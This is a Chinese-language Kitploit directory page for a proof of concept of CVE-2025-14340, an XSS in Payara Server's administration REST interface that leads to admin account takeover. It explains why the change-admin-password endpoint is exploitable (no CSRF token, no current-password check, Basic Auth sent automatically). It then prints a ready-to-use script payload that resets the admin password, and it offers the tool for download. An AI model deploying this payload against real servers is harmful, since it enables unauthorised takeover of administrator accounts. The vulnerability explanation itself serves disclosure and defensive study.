Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-14340 — PoC for CVE-2025-14340: Admin account takeover in Payara Server | Kitploit
工具/GitHubGitHub/deepsecurityresearch/cve-2025-14340
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubdeepsecurityresearch/cve-2025-14340

CVE-2025-14340

PoC for CVE-2025-14340: Admin account takeover in Payara Server

查看仓库
114个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

XSS 导致管理员账户接管(CVE-2025-14340)

Payara 的管理 REST 接口(Administration Rest Interface)中存在一个跨站脚本(XSS)漏洞,允许执行攻击者控制的 JavaScript,从而导致管理员账户被接管。原因如下:

  1. 该面板使用 HTTP Basic Auth(对于同源请求,浏览器会自动发送凭据)。
  2. change-admin-password 端点更新用户密码时不需要当前密码。
  3. change-admin-password 表单没有 CSRF 保护。
  4. 通过 /management/domain/version 中的 XSS 注入的脚本可以向 /management/domain/change-admin-password 发送 POST 请求,并为任意目标账户设置攻击者选择的密码——从而导致管理员账户被接管。

概念验证(Proof of Concept)

URL:

https://panel.example.com:4848/management/domain/version?<PAYLOAD>

载荷(PAYLOAD):

root@kitploit:~
<script>
fetch('/management/domain/change-admin-password', {
 method: 'POST',
 headers: {
 'X-Requested-By': 'GlassFish REST HTML interface',
 'Accept': 'text/html',
 'Content-Type': 'application/x-www-form-urlencoded'
 },
 body:
'id=admin&newpassword=P1234&password=P1234&__remove_empty_entries__=true&=chang
e-admin-password'
});
</script>

法律声明

仅限授权使用。DeepSecurity Perú 不认可未经授权的访问,并且对滥用所提供信息的任何行为不承担任何责任。

下载工具